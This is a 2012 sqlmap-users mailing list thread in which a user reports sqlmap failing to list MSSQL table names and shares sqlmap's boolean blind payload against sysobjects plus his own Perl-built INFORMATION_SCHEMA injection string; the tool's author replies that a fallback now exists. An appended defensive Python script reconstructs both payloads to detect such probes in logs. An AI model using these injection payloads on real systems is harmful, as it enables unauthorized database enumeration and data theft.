Hi Cats.
This should be implemented at this moment (as a backup plan if normal
retrieval of table names fails for whatever (read: privileges) reason).
Kind regards,
Miroslav Stampar
On Wed, Jan 4, 2012 at 12:50 PM, Miroslav Stampar <
miroslav.stam...@gmail.com> wrote:
> Hi Cats.
>
> Please wait for a day or two and you'll hopefully be able to use sqlmap in
> that case too.
>
> Kind regards,
> Miroslav Stampar
>
>
> On Mon, Jan 2, 2012 at 8:01 PM, cats <d...@alcor.se> wrote:
>
>> I can dump users and databases, but not the tables in any database.
>>
>> Here's some output from sqlmap:
>>
>> Revision: 4643
>>
>> [18:58:04] [INFO] the back-end DBMS is Microsoft SQL Server
>> web server operating system: Windows Vista
>> web application technology: ASP.NET, Microsoft IIS 7.0
>> back-end DBMS: Microsoft SQL Server 2008
>>
>> [18:58:04] [INFO] fetching tables for database: productcatalog
>> [18:58:04] [INFO] fetching number of tables for database
>> 'productcatalog'
>> [18:58:04] [PAYLOAD] 99047' AND ASCII(SUBSTRING((SELECT
>> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
>> eservice_productcatalog..sysobjects WHERE xtype IN
>> (CHAR(117),CHAR(118))),1,1)) > 51 AND 'cfIC'='cfIC
>> [18:58:05] [DEBUG] reflective value found and filtered out
>>
>> It just goes on like this and simply spits out a "retrieved" which is
>> empty, and it will continue doing so until it has reached the length of
>> the current table. Thus the result will be something like:
>>
>> dbo.""
>> dbo.""
>> dbo.""
>>
>> ...and so on
>>
>> I wrote a Perl script that could successfully extract the tables from my
>> database, using the following injection string.
>>
>> Clean version of the injection:
>>
>> AND (
>> CASE
>> WHEN SUBSTRING((
>> SELECT TOP 1 TABLE_NAME FROM (
>> SELECT TOP ' . $i . ' TABLE_NAME FROM
>> INFORMATION_SCHEMA.TABLES WHERE TABLE_CATALOG=\'' . $dbname . '\'
>> ORDER BY TABLE_NAME ASC) sq ORDER BY TABLE_NAME DESC),' . $nc .
>> ',1)=char(' . ord(substr($chars,$c,1)) . ') THEN 1 ELSE 2 END)=\'1
>>
>> So the important part is "SELECT TABLE_NAME FROM
>> INFORMATION_SCHEMA.TABLES", as "SELECT name FROM dbname..sysobjects
>> WHERE xtype = 'U'" doesn't seem to work for me.
>>
>> Has anyone else had this issue?
>> Am I doing something wrong, or is this a bug in sqlmap?
>> Or maybe it's the configuration on my mssql server?
>>
>> Anyway, advice is welcome :-)
>>
>> Cheers!
>>
>>
>>
>> ------------------------------------------------------------------------------
>> Ridiculously easy VDI. With Citrix VDI-in-a-Box, you don't need a complex
>> infrastructure or vast IT resources to deliver seamless, secure access to
>> virtual desktops. With this all-in-one solution, easily deploy virtual
>> desktops for less than the cost of PCs and save 60% on VDI infrastructure
>> costs. Try it free! http://p.sf.net/sfu/Citrix-VDIinabox
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
--
Miroslav Stampar
http://about.me/stamparm
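
Added example, not part of the original thread and not sqlmap code: a defender-side check that flags requests whose parameters combine a catalog reference (`sysobjects` or `INFORMATION_SCHEMA.TABLES`) with the character-by-character comparison both payloads in the thread rely on. The log format, the IP addresses, the URL paths and the values filled in for the Perl variables are assumptions made for the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, quote_plus, urlsplit

# Catalog objects named in the two payloads quoted in the thread.
CATALOG = re.compile(r"\bsysobjects\b|\bINFORMATION_SCHEMA\s*\.\s*TABLES\b", re.I)
# Both payloads read one character at a time and compare it to a code point.
EXTRACT = re.compile(r"\bSUBSTRING\s*\(", re.I)
COMPARE = re.compile(r"\bASCII\s*\(|\bCHAR\s*\(\s*\d+\s*\)", re.I)

# Payload shapes from the thread; the Perl variables in the second are
# filled with constructed values.
SYSOBJECTS = ("99047' AND ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name)))"
              " AS NVARCHAR(4000)),CHAR(32)) FROM eservice_productcatalog..sysobjects"
              " WHERE xtype IN (CHAR(117),CHAR(118))),1,1)) > 51 AND 'cfIC'='cfIC")
INFO_SCHEMA = ("99047' AND (CASE WHEN SUBSTRING((SELECT TOP 1 TABLE_NAME FROM (SELECT"
               " TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_CATALOG="
               "'productcatalog' ORDER BY TABLE_NAME ASC) sq ORDER BY TABLE_NAME DESC)"
               ",1,1)=char(97) THEN 1 ELSE 2 END)='1")

# Constructed log lines in an assumed "client_ip request_target" format.
SAMPLE_LOG = "\n".join([
    "198.51.100.7 /item.aspx?id=99047",
    "198.51.100.7 /item.aspx?id=" + quote_plus(SYSOBJECTS),
    "198.51.100.7 /item.aspx?id=" + quote_plus(INFO_SCHEMA),
    "203.0.113.9 /search.aspx?q=sysobjects+vs+INFORMATION_SCHEMA.TABLES",
])


def catalog_probes(log_text):
    """Count, per client, requests whose parameter values combine a catalog
    reference with character-wise extraction and comparison."""
    hits = Counter()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client, target = line.split(None, 1)
        for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if all(p.search(value) for p in (CATALOG, EXTRACT, COMPARE)):
                hits[client] += 1
                break  # one hit per request is enough
    return hits


if __name__ == "__main__":
    for client, count in catalog_probes(SAMPLE_LOG).most_common():
        print(f"{client}: {count} catalog-enumeration request(s)")
```

Requiring all three patterns together keeps a plain search for the catalog names (the last sample line) from being flagged.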